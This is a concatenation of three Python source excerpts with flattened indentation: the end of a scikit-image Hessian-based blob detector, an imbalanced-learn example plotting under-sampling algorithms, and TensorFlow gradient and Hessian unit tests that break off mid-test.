Notes
-----
The radius of each blob is approximately `sigma`.
Computation of Determinant of Hessians is independent of the standard
deviation. Therefore detecting larger blobs won't take more time. In
methods line :py:meth:`blob_dog` and :py:meth:`blob_log` the computation
of Gaussians for larger `sigma` takes more time. The downside is that
this method can't be used for detecting blobs of radius less than `3px`
due to the box filters used in the approximation of Hessian Determinant.
"""
assert_nD(image, 2)
image = img_as_float(image)
image = integral_image(image)
if log_scale:
start, stop = log(min_sigma, 10), log(max_sigma, 10)
sigma_list = np.logspace(start, stop, num_sigma)
else:
sigma_list = np.linspace(min_sigma, max_sigma, num_sigma)
hessian_images = [_hessian_matrix_det(image, s) for s in sigma_list]
image_cube = np.dstack(hessian_images)
local_maxima = peak_local_max(image_cube, threshold_abs=threshold,
footprint=np.ones((3, 3, 3)),
threshold_rel=0.0,
exclude_border=False)
# Convert local_maxima to float64
lm = local_maxima.astype(np.float64)
# Convert the last index to its corresponding scale value
lm[:, 2] = sigma_list[local_maxima[:, 2]]
local_maxima = lm
return _prune_blobs(local_maxima, overlap)
|
|
"""
=====================================================
Comparison of the different under-sampling algorithms
=====================================================
The following example attends to make a qualitative comparison between the
different under-sampling algorithms available in the imbalanced-learn package.
"""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# License: MIT
from collections import Counter
import matplotlib.pyplot as plt
import numpy as np
from sklearn.datasets import make_classification
from sklearn.svm import LinearSVC
from sklearn.linear_model import LogisticRegression
from imblearn.pipeline import make_pipeline
from imblearn.under_sampling import (ClusterCentroids, RandomUnderSampler,
NearMiss,
InstanceHardnessThreshold,
CondensedNearestNeighbour,
EditedNearestNeighbours,
RepeatedEditedNearestNeighbours,
AllKNN,
NeighbourhoodCleaningRule,
OneSidedSelection)
print(__doc__)
###############################################################################
# The following function will be used to create toy dataset. It using the
# ``make_classification`` from scikit-learn but fixing some parameters.
def create_dataset(n_samples=1000, weights=(0.01, 0.01, 0.98), n_classes=3,
class_sep=0.8, n_clusters=1):
return make_classification(n_samples=n_samples, n_features=2,
n_informative=2, n_redundant=0, n_repeated=0,
n_classes=n_classes,
n_clusters_per_class=n_clusters,
weights=list(weights),
class_sep=class_sep, random_state=0)
###############################################################################
# The following function will be used to plot the sample space after resampling
# to illustrate the characteristic of an algorithm.
def plot_resampling(X, y, sampling, ax):
X_res, y_res = sampling.fit_sample(X, y)
ax.scatter(X_res[:, 0], X_res[:, 1], c=y_res, alpha=0.8, edgecolor='k')
# make nice plotting
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.spines['left'].set_position(('outward', 10))
ax.spines['bottom'].set_position(('outward', 10))
return Counter(y_res)
###############################################################################
# The following function will be used to plot the decision function of a
# classifier given some data.
def plot_decision_function(X, y, clf, ax):
plot_step = 0.02
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),
np.arange(y_min, y_max, plot_step))
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
ax.contourf(xx, yy, Z, alpha=0.4)
ax.scatter(X[:, 0], X[:, 1], alpha=0.8, c=y, edgecolor='k')
###############################################################################
# Prototype generation: under-sampling by generating new samples
###############################################################################
###############################################################################
# ``ClusterCentroids`` under-samples by replacing the original samples by the
# centroids of the cluster found.
fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 6))
X, y = create_dataset(n_samples=5000, weights=(0.01, 0.05, 0.94),
class_sep=0.8)
clf = LinearSVC().fit(X, y)
plot_decision_function(X, y, clf, ax1)
ax1.set_title('Linear SVC with y={}'.format(Counter(y)))
sampler = ClusterCentroids(random_state=0)
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax2)
ax2.set_title('Decision function for {}'.format(sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax3)
ax3.set_title('Resampling using {}'.format(sampler.__class__.__name__))
fig.tight_layout()
###############################################################################
# Prototype selection: under-sampling by selecting existing samples
###############################################################################
###############################################################################
# The algorithm performing prototype selection can be subdivided into two
# groups: (i) the controlled under-sampling methods and (ii) the cleaning
# under-sampling methods.
###############################################################################
# With the controlled under-sampling methods, the number of samples to be
# selected can be specified. ``RandomUnderSampler`` is the most naive way of
# performing such selection by randomly selecting a given number of samples by
# the targetted class.
fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 6))
X, y = create_dataset(n_samples=5000, weights=(0.01, 0.05, 0.94),
class_sep=0.8)
clf = LinearSVC().fit(X, y)
plot_decision_function(X, y, clf, ax1)
ax1.set_title('Linear SVC with y={}'.format(Counter(y)))
sampler = RandomUnderSampler(random_state=0)
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax2)
ax2.set_title('Decision function for {}'.format(sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax3)
ax3.set_title('Resampling using {}'.format(sampler.__class__.__name__))
fig.tight_layout()
###############################################################################
# ``NearMiss`` algorithms implement some heuristic rules in order to select
# samples. NearMiss-1 selects samples from the majority class for which the
# average distance of the :math:`k`` nearest samples of the minority class is
# the smallest. NearMiss-2 selects the samples from the majority class for
# which the average distance to the farthest samples of the negative class is
# the smallest. NearMiss-3 is a 2-step algorithm: first, for each minority
# sample, their ::math:`m` nearest-neighbors will be kept; then, the majority
# samples selected are the on for which the average distance to the :math:`k`
# nearest neighbors is the largest.
fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3, 2,
figsize=(15, 25))
X, y = create_dataset(n_samples=5000, weights=(0.1, 0.2, 0.7), class_sep=0.8)
ax_arr = ((ax1, ax2), (ax3, ax4), (ax5, ax6))
for ax, sampler in zip(ax_arr, (NearMiss(version=1, random_state=0),
NearMiss(version=2, random_state=0),
NearMiss(version=3, random_state=0))):
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax[0])
ax[0].set_title('Decision function for {}-{}'.format(
sampler.__class__.__name__, sampler.version))
plot_resampling(X, y, sampler, ax[1])
ax[1].set_title('Resampling using {}-{}'.format(
sampler.__class__.__name__, sampler.version))
fig.tight_layout()
###############################################################################
# ``EditedNearestNeighbours`` removes samples of the majority class for which
# their class differ from the one of their nearest-neighbors. This sieve can be
# repeated which is the principle of the
# ``RepeatedEditedNearestNeighbours``. ``AllKNN`` is slightly different from
# the ``RepeatedEditedNearestNeighbours`` by changing the :math:`k` parameter
# of the internal nearest neighors algorithm, increasing it at each iteration.
fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3, 2,
figsize=(15, 25))
X, y = create_dataset(n_samples=500, weights=(0.2, 0.3, 0.5), class_sep=0.8)
ax_arr = ((ax1, ax2), (ax3, ax4), (ax5, ax6))
for ax, sampler in zip(ax_arr, (
EditedNearestNeighbours(random_state=0),
RepeatedEditedNearestNeighbours(random_state=0),
AllKNN(random_state=0, allow_minority=True))):
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax[0])
ax[0].set_title('Decision function for {}'.format(
sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax[1])
ax[1].set_title('Resampling using {}'.format(
sampler.__class__.__name__))
fig.tight_layout()
###############################################################################
# ``CondensedNearestNeighbour`` makes use of a 1-NN to iteratively decide if a
# sample should be kept in a dataset or not. The issue is that
# ``CondensedNearestNeighbour`` is sensitive to noise by preserving the noisy
# samples. ``OneSidedSelection`` also used the 1-NN and use ``TomekLinks`` to
# remove the samples considered noisy. The ``NeighbourhoodCleaningRule`` use a
# ``EditedNearestNeighbours`` to remove some sample. Additionally, they use a 3
# nearest-neighbors to remove samples which do not agree with this rule.
fig, ((ax1, ax2), (ax3, ax4), (ax5, ax6)) = plt.subplots(3, 2,
figsize=(15, 25))
X, y = create_dataset(n_samples=500, weights=(0.2, 0.3, 0.5), class_sep=0.8)
ax_arr = ((ax1, ax2), (ax3, ax4), (ax5, ax6))
for ax, sampler in zip(ax_arr, (
CondensedNearestNeighbour(random_state=0),
OneSidedSelection(random_state=0),
NeighbourhoodCleaningRule(random_state=0))):
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax[0])
ax[0].set_title('Decision function for {}'.format(
sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax[1])
ax[1].set_title('Resampling using {}'.format(
sampler.__class__.__name__))
fig.tight_layout()
###############################################################################
# ``InstanceHardnessThreshold`` uses the prediction of classifier to exclude
# samples. All samples which are classified with a low probability will be
# removed.
fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20, 6))
X, y = create_dataset(n_samples=5000, weights=(0.01, 0.05, 0.94),
class_sep=0.8)
clf = LinearSVC().fit(X, y)
plot_decision_function(X, y, clf, ax1)
ax1.set_title('Linear SVC with y={}'.format(Counter(y)))
sampler = InstanceHardnessThreshold(random_state=0,
estimator=LogisticRegression())
clf = make_pipeline(sampler, LinearSVC())
clf.fit(X, y)
plot_decision_function(X, y, clf, ax2)
ax2.set_title('Decision function for {}'.format(sampler.__class__.__name__))
plot_resampling(X, y, sampler, ax3)
ax3.set_title('Resampling using {}'.format(sampler.__class__.__name__))
fig.tight_layout()
plt.show()
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import warnings
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.constant_op import constant
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_grad # pylint: disable=unused-import
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import custom_gradient
from tensorflow.python.ops import data_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import data_flow_ops # pylint: disable=unused-import
from tensorflow.python.ops import functional_ops # pylint: disable=unused-import
from tensorflow.python.ops import gradients
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_grad # pylint: disable=unused-import
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.nn_ops import bias_add
from tensorflow.python.platform import googletest
def _OpsBetween(to_ops, from_ops):
"""Build the list of operations between two lists of Operations.
Args:
to_ops: list of Operations.
from_ops: list of Operations.
Returns:
The list of operations between "from_ops" and "to_ops", sorted by
decreasing operation id. This list contains all elements of to_ops.
TODO(touts): Think about returning an empty list if from_ops are not
reachable from to_ops. Presently it returns to_ops in that case.
"""
# Ops that are reachable from the output of "input_ops".
reached_ops = set()
# We only care to reach up to "output_ops" so we mark the
# output ops as reached to avoid recursing past them.
for op in to_ops:
reached_ops.add(op)
gradients_impl._MarkReachedOps(from_ops, reached_ops)
between_ops = gradients_impl._GatherInputs(to_ops, reached_ops)
between_ops.sort(key=lambda x: -x._id)
return between_ops
class GradientsTest(test_util.TensorFlowTestCase):
def _OpNames(self, op_list):
return ["%s/%d" % (str(op.name), op._id) for op in op_list]
def _assertOpListEqual(self, ops1, ops2):
self.assertEquals(self._OpNames(ops1), self._OpNames(ops2))
def testOpsBetweenSimple(self):
with ops.Graph().as_default():
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
# Full graph
self._assertOpListEqual([t3.op, t2.op, t1.op],
_OpsBetween([t3.op], [t1.op, t2.op]))
# Only t1, t3.
self._assertOpListEqual([t3.op, t1.op], _OpsBetween([t3.op], [t1.op]))
def testOpsBetweenUnreachable(self):
with ops.Graph().as_default():
t1 = constant(1.0)
t2 = constant(2.0)
_ = array_ops.stack([t1, t2])
t4 = constant(1.0)
t5 = constant(2.0)
t6 = array_ops.stack([t4, t5])
# Elements of to_ops are always listed.
self._assertOpListEqual([t6.op], _OpsBetween([t6.op], [t1.op]))
def testOpsBetweenCut(self):
with ops.Graph().as_default():
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
t4 = constant([1.0])
t5 = array_ops.concat([t4, t3], 0)
t6 = constant([2.0])
t7 = array_ops.concat([t5, t6], 0)
self._assertOpListEqual([t7.op, t5.op, t4.op],
_OpsBetween([t7.op], [t4.op]))
def testOpsBetweenCycle(self):
with ops.Graph().as_default():
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
t4 = array_ops.concat([t3, t3, t3], 0)
t5 = constant([1.0])
t6 = array_ops.concat([t4, t5], 0)
t7 = array_ops.concat([t6, t3], 0)
self._assertOpListEqual([t6.op, t4.op, t3.op],
_OpsBetween([t6.op], [t3.op]))
self._assertOpListEqual([t7.op, t6.op, t5.op, t4.op, t3.op, t1.op],
_OpsBetween([t7.op], [t1.op, t5.op]))
self._assertOpListEqual([t6.op, t5.op, t4.op, t3.op, t2.op],
_OpsBetween([t6.op], [t2.op, t5.op]))
def testGradients(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[32, 100], name="in")
w = constant(1.0, shape=[100, 10], name="w")
b = constant(1.0, shape=[10], name="b")
xw = math_ops.matmul(inp, w, name="xw")
h = bias_add(xw, b, name="h")
w_grad = gradients.gradients(h, w)[0]
self.assertEquals("MatMul", w_grad.op.type)
self.assertEquals(w_grad.op._original_op, xw.op)
self.assertTrue(w_grad.op.get_attr("transpose_a"))
self.assertFalse(w_grad.op.get_attr("transpose_b"))
def testUnusedOutput(self):
with ops.Graph().as_default():
w = constant(1.0, shape=[2, 2])
x = constant(1.0, shape=[2, 2])
wx = math_ops.matmul(w, x)
split_wx = array_ops.split(value=wx, num_or_size_splits=2, axis=0)
c = math_ops.reduce_sum(split_wx[1])
gw = gradients.gradients(c, [w])[0]
self.assertEquals("MatMul", gw.op.type)
def testColocateGradients(self):
with ops.Graph().as_default() as g:
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
with g.device("/device:GPU:0"):
wx = math_ops.matmul(w, x)
gw = gradients.gradients(wx, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw.op.colocation_groups(), wx.op.colocation_groups())
def testColocateGradientsWithAggregation(self):
with ops.Graph().as_default() as g:
with g.device("/device:GPU:1"):
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
y = constant(1.0, shape=[1, 2])
wx = math_ops.matmul(w, x)
wy = math_ops.matmul(w, y)
with g.device("/device:GPU:0"):
z = wx + wy
gw1 = gradients.gradients(z, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw1.op.colocation_groups(), wx.op.colocation_groups())
gw2 = gradients.gradients(z, [w], colocate_gradients_with_ops=False)[0]
self.assertTrue(wx.op.colocation_groups() != gw2.op.colocation_groups())
def testColocateGradientsWithAggregationInMultipleDevices(self):
with ops.Graph().as_default() as g:
with g.device("/device:GPU:1"):
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
y = constant(1.0, shape=[1, 2])
with g.device("/task:1"):
wx = math_ops.matmul(w, x)
with g.device("/task:2"):
wy = math_ops.matmul(w, y)
with g.device("/device:GPU:0"):
z = wx + wy
gw1 = gradients.gradients(z, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw1.op.colocation_groups(), w.op.colocation_groups())
gw2 = gradients.gradients(z, [w], colocate_gradients_with_ops=False)[0]
self.assertTrue(w.op.colocation_groups() != gw2.op.colocation_groups())
def testColocateGradientsWithGateGradients(self):
if not test_util.is_gpu_available():
self.skipTest("No GPU available")
with ops.Graph().as_default() as g:
with g.device("/device:CPU:0"):
x = constant(1.0, shape=[1, 1])
y = constant(1.0, shape=[1, 1])
s = x + y
with g.device("/device:GPU:0"):
z = math_ops.reduce_sum(s)
gz_x = gradients.gradients(z, [x], colocate_gradients_with_ops=True,
gate_gradients=True)[0]
with session.Session():
# Make sure the placer doesn't complain.
gz_x.eval()
def testBoundaryStop(self):
# Test that we don't differentiate 'x'. The gradient function for 'x' is
# set explicitly to None so we will get an exception if the gradient code
# tries to differentiate 'x'.
with ops.Graph().as_default():
c = constant(1.0)
x = array_ops.identity(c)
y = x + 1.0
z = y + 1
grads = gradients.gradients(z, [x])
self.assertTrue(all(x is not None for x in grads))
def testBoundaryContinue(self):
# Test that we differentiate both 'x' and 'y' correctly when x is a
# predecessor of y.
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y * 3.0
grads = gradients.gradients(z, [x, y])
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(6.0, grads[0].eval())
def testAggregationMethodAccumulateN(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y],
aggregation_method=gradients.AggregationMethod.
EXPERIMENTAL_ACCUMULATE_N)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testAggregationMethodAddN(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y], aggregation_method=gradients.AggregationMethod.ADD_N)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testAggregationMethodTree(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y],
aggregation_method=gradients.AggregationMethod.EXPERIMENTAL_TREE)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testNoGradientForStringOutputs(self):
with ops.Graph().as_default():
def _TestOpGrad(_, float_grad, string_grad):
"""Gradient function for TestStringOutput."""
self.assertEquals(float_grad.dtype, dtypes.float32)
self.assertFalse(string_grad)
return float_grad
ops.RegisterGradient("TestStringOutput")(_TestOpGrad)
c = constant(1.0)
x, _ = test_ops.test_string_output(c)
z = x * 2.0
w = z * 3.0
grads = gradients.gradients(z, [c])
self.assertTrue(isinstance(grads[0], ops.Tensor))
grads = gradients.gradients(w, [c])
self.assertTrue(isinstance(grads[0], ops.Tensor))
def testSingletonIndexedSlices(self):
with ops.Graph().as_default():
x = array_ops.placeholder(dtypes.float32)
y = array_ops.identity(x)
dy = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32))
dx, = gradients.gradients(y, x, grad_ys=dy)
# The IndexedSlices gradient of tf.identity is the identity map.
with self.test_session() as sess:
vdx, vdy = sess.run(
[dx, dy], feed_dict={x: [1.0], dy.indices: [0], dy.values: [2.0]})
self.assertEqual(vdx, vdy)
def testNonDifferentiableSwitchInWhileLoop(self):
with ops.Graph().as_default():
v = array_ops.placeholder(dtypes.float32, [])
def _Step(i, a, ta):
a += math_ops.cast(v, dtypes.int32)
return (i + 1, a, ta.write(i, a))
n = 4
i, _, ta = control_flow_ops.while_loop(
lambda i, *_: i < n,
_Step, [0, 0, tensor_array_ops.TensorArray(
dtypes.int32, size=n)])
target = ta.read(i - 1)
grad, = gradients.gradients(target, v)
self.assertIsNone(grad)
def testVariableReadValueGradient(self):
with ops.Graph().as_default():
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(var.read_value(), var)
self.assertIsNotNone(gradient)
def testVariableAsGraphElementGradient(self):
with ops.Graph().as_default() as graph:
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(graph.as_graph_element(var), var)
self.assertIsNotNone(gradient)
def testVariableRefGradient(self):
with ops.Graph().as_default():
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(var._ref(), var)
self.assertIsNotNone(gradient)
def testDependentYs(self):
with self.test_session():
x = constant_op.constant(3.0)
y = math_ops.square(x)
y1 = math_ops.square(y)
y2 = math_ops.square(y1)
g = gradients.gradients([y, y2], x)
self.assertAllClose(17502.0, g[0].eval())
g = gradients.gradients(y + y2, x)
self.assertAllClose(17502.0, g[0].eval())
z = array_ops.identity(y)
z2 = array_ops.identity(y2)
g = gradients.gradients([z, z2], x)
self.assertAllClose(17502.0, g[0].eval())
def testPartialDerivatives(self):
with self.test_session():
x = constant_op.constant(1.)
y = 2 * x
z = x + y
totalg = gradients.gradients(z, [x, y])
self.assertEqual([3.0, 1.0], [g.eval() for g in totalg])
partialg = gradients.gradients(z, [x, y], stop_gradients=[x, y])
self.assertEqual([1.0, 1.0], [g.eval() for g in partialg])
def testStopGradients(self):
def _MakeGraph(rng, stop_gradients=()):
def _FunctionOf(xs, k=3):
return ops.convert_to_tensor(
sum(math_ops.matmul(rng.rand(k, k), x) for x in xs)
+ rng.rand(k, k))
a = _FunctionOf([])
if "a" in stop_gradients: a = array_ops.stop_gradient(a)
b = _FunctionOf([a])
if "b" in stop_gradients: b = array_ops.stop_gradient(b)
c = _FunctionOf([a, b])
if "c" in stop_gradients: c = array_ops.stop_gradient(c)
d = _FunctionOf([b, c])
if "d" in stop_gradients: d = array_ops.stop_gradient(d)
return dict(a=a, b=b, c=c, d=d)
def _Gradients(ys, xs, **kwargs):
dydxs = gradients.gradients(ys, xs, **kwargs)
dydxs = [0. * x if dydx is None else dydx
for x, dydx in zip(xs, dydxs)]
return dydxs
seed = np.random.randint(1000)
cases = []
subsets = [""] + "a b c d ab ac ad bc bd cd abc abd acd bcd abcd".split()
graph = _MakeGraph(np.random.RandomState(seed))
for constants in subsets:
graph_with_stops = _MakeGraph(np.random.RandomState(seed), constants)
for variables_ in subsets:
# compute the gradient when stopped using tf.stop_gradients
grad1 = _Gradients([graph_with_stops["d"]],
[graph_with_stops[v] for v in variables_])
# compute the gradient when stopped using the stop_gradients kwarg
grad2 = _Gradients([graph["d"]],
[graph[v] for v in variables_],
stop_gradients=[graph[v] for v in constants])
cases.append(dict(grad1=grad1, grad2=grad2,
constants=constants, variables=variables_))
# evaluate all tensors in one call to session.run for speed
with self.test_session() as sess:
results = sess.run([(case["grad1"], case["grad2"]) for case in cases])
for (npgrad1, npgrad2), case in zip(results, cases):
for a, b in zip(npgrad1, npgrad2):
np.testing.assert_allclose(a, b)
class FunctionGradientsTest(test_util.TensorFlowTestCase):
@classmethod
def XSquarePlusB(cls, x, b):
return x * x + b
@classmethod
def XSquarePlusBGradient(cls, x, b, g):
# Perturb gradients (multiply by 2), so we can test that this was called.
g *= 2.0
return g * 2.0 * x, g
@classmethod
def _PythonGradient(cls, op, grad):
# Perturb gradients (multiply by 3), so we can test that this was called.
grad *= 3.0
return grad * op.inputs[0] * 2.0, grad
@classmethod
def _GetFunc(cls, **kwargs):
return function.Defun(dtypes.float32, dtypes.float32, **
kwargs)(cls.XSquarePlusB)
def _GetFuncGradients(self, f, x_value, b_value):
x = constant_op.constant(x_value, name="x")
b = constant_op.constant(b_value, name="b")
y = f(x, b)
grads = gradients.gradients(y, [x, b])
with self.test_session() as sess:
return sess.run(grads)
def testFunctionGradientsBasic(self):
g = ops.Graph()
with g.as_default():
f = self._GetFunc()
# Get gradients (should add SymbolicGradient node for function).
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0], grads[0])
self.assertAllEqual([1.0], grads[1])
def testFunctionGradientsComposition(self):
with ops.Graph().as_default():
f = self._GetFunc()
x = constant_op.constant([2.0], name="x")
b1 = constant_op.constant([1.0], name="b1")
b2 = constant_op.constant([1.0], name="b2")
y = f(f(x, b1), b2)
# Build gradient graph (should add SymbolicGradient node for function).
grads = gradients.gradients(y, [x, b1])
with self.test_session() as sess:
self.assertAllEqual([40.0], sess.run(grads)[0])
self.assertAllEqual([10.0], sess.run(grads)[1])
def testFunctionGradientsWithGradFunc(self):
g = ops.Graph()
with g.as_default():
grad_func = function.Defun(dtypes.float32, dtypes.float32,
dtypes.float32)(self.XSquarePlusBGradient)
f = self._GetFunc(grad_func=grad_func)
# Get gradients (should add SymbolicGradient node for function, which
# uses the grad_func above, which multiplies all gradients by 2).
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0 * 2], grads[0])
self.assertAllEqual([1.0 * 2], grads[1])
def testFunctionGradientWithRegistration(self):
g = ops.Graph()
with g.as_default():
f = self._GetFunc(python_grad_func=self._PythonGradient)
# Get gradients, using the python gradient function. It multiplies the
# gradients by 3.
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0 * 3], grads[0])
self.assertAllEqual([1.0 * 3], grads[1])
def testFunctionGradientWithGradFuncAndRegistration(self):
g = ops.Graph()
with g.as_default():
grad_func = function.Defun(dtypes.float32, dtypes.float32,
dtypes.float32)(self.XSquarePlusBGradient)
with self.assertRaisesRegexp(ValueError, "Gradient defined twice"):
f = self._GetFunc(
grad_func=grad_func, python_grad_func=self._PythonGradient)
f.add_to_graph(ops.Graph())
class StopGradientTest(test_util.TensorFlowTestCase):
def testStopGradient(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[100, 32], name="in")
out = array_ops.stop_gradient(inp)
igrad = gradients.gradients(out, inp)[0]
assert igrad is None
class PreventGradientTest(test_util.TensorFlowTestCase):
def testPreventGradient(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[100, 32], name="in")
out = array_ops.prevent_gradient(inp)
with self.assertRaisesRegexp(LookupError, "explicitly disabled"):
_ = gradients.gradients(out, inp)
class HessianVectorProductTest(test_util.TensorFlowTestCase):
def testHessianVectorProduct(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that HessianVectorProduct matches multiplication by the
# explicit Hessian.
# Specifically, the Hessian of f(x) = x^T A x is
# H = A + A^T.
# We expect HessianVectorProduct(f(x), x, v) to be H v.
m = 4
rng = np.random.RandomState([1, 2, 3])
mat_value = rng.randn(m, m).astype("float32")
v_value = rng.randn(m, 1).astype("float32")
x_value = rng.randn(m, 1).astype("float32")
hess_value = mat_value + mat_value.T
hess_v_value = np.dot(hess_value, v_value)
for use_gpu in [False, True]:
with self.test_session(use_gpu=use_gpu):
mat = constant_op.constant(mat_value)
v = constant_op.constant(v_value)
x = constant_op.constant(x_value)
mat_x = math_ops.matmul(mat, x, name="Ax")
x_mat_x = math_ops.matmul(array_ops.transpose(x), mat_x, name="xAx")
hess_v = gradients_impl._hessian_vector_product(x_mat_x, [x], [v])[0]
hess_v_actual = hess_v.eval()
self.assertAllClose(hess_v_value, hess_v_actual)
class HessianTest(test_util.TensorFlowTestCase):
def testHessian1D(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that `hessian` matches. Specifically, the Hessian of
# f(x) = x^T A x is H = A + A^T.
m = 4
rng = np.random.RandomState([1, 2, 3])
mat_value = rng.randn(m, m).astype("float32")
x_value = rng.randn(m).astype("float32")
hess_value = mat_value + mat_value.T
with self.test_session(use_gpu=True):
mat = constant_op.constant(mat_value)
x = constant_op.constant(x_value)
x_mat_x = math_ops.reduce_sum(x[:, None] * mat * x[None, :])
hess = gradients.hessians(x_mat_x, x)[0]
hess_actual = hess.eval()
self.assertAllClose(hess_value, hess_actual)
def testHessian1D_multi(self):
# Test the computation of the hessian with respect to multiple tensors
m = 4
n = 3
rng = np.random.RandomState([1, 2, 3])
mat_values = [rng.randn(m, m).astype("float32") for _ in range(n)]
x_values = [rng.randn(m).astype("float32") for _ in range(n)]
hess_values = [mat_value + mat_value.T for mat_value in mat_values]
with self.test_session(use_gpu=True):
mats = [constant_op.constant(mat_value) for mat_value in mat_values]
xs = [constant_op.constant(x_value) for x_value in x_values]
xs_mats_xs = [
math_ops.reduce_sum(x[:, None] * mat * x[None, :])
for x, mat in zip(xs, mats)
]
hessians = gradients.hessians(xs_mats_xs, xs)
hessians_actual = [hess.eval() for hess in hessians]
for hess_value, hess_actual in zip(hess_values, hessians_actual):
self.assertAllClose(hess_value, hess_actual)
def testHessianInvalidDimension(self):
for shape in [(10, 10), None]:
with self.test_session(use_gpu=True):
x = array_ops.placeholder(dtypes.float32, shape)
# Expect a ValueError because the dimensions are wrong
with self.assertRaises(ValueError):
gradients.hessians(x, x)
def testHessian2D_square_matrix(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that `hessian` matches. Specifically, the Hessian of
# f(x) = 1/2 * x^T * x is H = constant (block identity matrix)
m = 3
rng = np.random.RandomState([1, 2, 3])
x_value = rng.randn(m, m).astype("float32")
with self.test_session(use_gpu=True):
x = constant_op.constant(x_value)
x_square = math_ops.reduce_sum(
math_ops.matmul(array_ops.transpose(x), x) * 0.5
)
hess = gradients.hessians(x_square, x)[0]
hess_actual = hess.eval()
hess_value = np.bmat([
[elem*np.ones((m, m)) for elem in vec]
for vec in np.eye(m)
]).astype("float32")
self.assertAllEqual((m, m, m, m), hess_actual.shape)
